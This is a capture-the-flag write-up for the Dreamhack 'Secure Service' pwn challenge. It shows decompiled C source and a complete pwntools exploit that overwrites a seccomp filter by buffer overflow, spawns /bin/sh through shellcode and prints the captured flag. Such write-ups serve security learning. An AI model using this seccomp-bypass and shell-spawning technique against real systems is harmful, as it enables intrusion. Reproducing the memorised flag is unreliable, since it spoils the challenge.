Description
We made a nice “sandbox” program. feel free to attack our service 🙂
checksec
ubuntu@wh1te4ever-main:~/Desktop/dreamhack-CTF/Secure_Service/deploy$ checksec ./secure-service
[*] '/home/ubuntu/Desktop/dreamhack-CTF/Secure_Service/deploy/secure-service'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX disabled
PIE: PIE enabled
RWX: Has RWX segments
Decompiled-src
main
int __fastcall __noreturn main(int argc, const char **argv, const char **envp)
{
char s[40]; // [rsp+0h] [rbp-30h] BYREF
unsigned __int64 v4; // [rsp+28h] [rbp-8h]
v4 = __readfsqword(0x28u);
init();
memset(s, 0, 0x20uLL);
puts("We made a nice \"sandbox\" program :)");
puts("Feel free to try to attack our service. No one can infiltrate our system :)");
while ( 1 )
{
printf("which method? ");
__isoc99_scanf("%31s", s);
if ( !strcmp(s, "bof") )
{
bof();
}
else if ( !strcmp(s, "shellcode") )
{
shellcode();
}
else if ( !strcmp(s, "quit") )
{
exit(0);
}
}
}
bof
__int64 bof()
{
puts("You chose to bof to attack my system.");
printf("payload: ");
return __isoc99_scanf("%278s", &g_buf);
}
shellcode
char *shellcode()
{
char s[136]; // [rsp+0h] [rbp-90h] BYREF
unsigned __int64 v2; // [rsp+88h] [rbp-8h]
v2 = __readfsqword(0x28u);
memset(s, 144, 0x80uLL);
puts("You chose to shellcode to attack my system.");
printf("shellcode: ");
read(0, s, 0x80uLL);
sandbox();
((void (*)(void))s)();
return (char *)(v2 - __readfsqword(0x28u));
}
sandbox
int sandbox()
{
int result; // eax
if ( prctl(38, 1LL, 0LL, 0LL, 0LL) == -1 ) // 38 = PR_SET_NO_NEW_PRIVS
exit(1);
result = prctl(22, seccomp_mode, &prog); // 22 = PR_SET_SECCOMP
// seccomp_mode = SECCOMP_MODE_STRICT
if ( result == -1 )
exit(1);
return result;
}
Anlaysis
Solution
from pwn import *
#context.log_level = 'debug'
context(arch='amd64',os='linux')
warnings.filterwarnings('ignore')
p = remote('host3.dreamhack.games', 14995)
#p = process('./secure-service')
e = ELF('./secure-service', checksec=False)
p.sendlineafter(b'which method? ', b'bof')
filter = b'\x06\x00\x00\x00\x00\x00\xFF\x7F' * 3 + b"\x00"*8 #BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_ALLOW)
payload = b''
payload += b'\x41'*128 #g_buf
payload += filter
payload += b'\x00'*96 #dummy
payload += b'\x02' #SECCOMP_MODE_FILTER
p.sendlineafter(b'payload: ', payload)
p.sendlineafter(b'which method? ', b'shellcode')
asmcode = shellcraft.execve("/bin/sh", 0, 0)
shellcode = asm(asmcode)
p.sendlineafter(b'shellcode: ', shellcode)
p.interactive()
Result
ubuntu@wh1te4ever-main:~/Desktop/dreamhack-CTF/Secure_Service/deploy$ python3 solve.py
[+] Opening connection to host3.dreamhack.games on port 14995: Done
[*] Switching to interactive mode
$ ls
flag
secure-service
$ cat flag
DH{b9f9c8d45287f38e6b2a42ec55aef9dafd96900db31e89e21eed4c67b345600b}
$
[*] Interrupted
[*] Closed connection to host3.dreamhack.games port 14995